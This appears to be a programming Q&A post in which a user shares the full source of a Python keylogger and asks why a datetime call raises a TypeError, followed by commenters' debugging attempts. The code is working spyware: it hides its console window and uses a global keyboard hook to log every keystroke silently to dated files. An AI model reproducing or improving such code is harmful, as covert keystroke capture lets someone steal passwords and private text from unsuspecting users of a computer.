# getting date issue in making keylogger

Tags: python, datetime, keylogger, pyhook

I'm making a key logger with python it is done but i want to name the file with date and time name because it will be easy to read like this but it gives me this error :

```
Traceback (most recent call last):
  File "C:\Python27\lib\site-packages\pyHook\HookManager.py", line 351, in KeyboardSwitch
    return func(event)
  File "D:/omar/Python/projects/windows/Windows_keyLogger.py", line 14, in pressed_chars
    date = str(datetime.date.today())
TypeError: an integer is required
```

and this is my code :

```
import pyHook
import pythoncom
import win32gui
import win32console
import datetime
import time
import os

window = win32console.GetConsoleWindow()  #go to script window
win32gui.ShowWindow(window,0)             #hide window

def pressed_chars(event):
    try:
        date = str(datetime.date.today())
        hour = str(datetime.datetime.now().strftime("%H"))
        write = open("D:/mine/" + date + "/" + hour + "/" + hour + ".log", 'a')
    except IOError:
        try:
            date = str(datetime.date.today())
            os.makedirs("D:/mine/" + date + "/" + hour)
        except OSError, e:
            if e.errno != 17:
                raise
            time.sleep(1)
            pass
    if event.Ascii:
        char = chr(event.Ascii) # (insert real char in variable)
        if event.Ascii == 13:   # (if char is "return")
            write.write("\n")       # (new line)
        write.write(char)           # (write char)



proc = pyHook.HookManager()      #open pyHook
proc.KeyDown = pressed_chars     #set pressed_chars function on KeyDown event
proc.HookKeyboard()              #start the function
pythoncom.PumpMessages()         #get input
```

and do i have to write those 2 lines

```
 window = win32console.GetConsoleWindow()  #go to script window
win32gui.ShowWindow(window,0)             #hide window
```

Comment: I would agree with roganjosh, the command looks fine. Have you tried restarting your Python environment? Maybe a namespace problem

Comment: @roganjosh i knew that this is right i just don't know what is the issue

Comment: @calico_ i tried alot

Comment: @roganjosh i actually don't understand you

Comment: I did two things: 1) added a `print event.Time` directly under `def pressed_chars(event)` to confirm it fired on every key press. 2) Put `return True` at the end of `pressed_chars` to suppress a warning. Neither change fundamentally alters the way your code works. Everything works fine, there is no `TypeError: an integer is required`. I cannot get that error. I can only guess that you have named something `str` somewhere else but it's not in your current code; the error is not normal - `str(datetime.date.today())` is perfectly valid.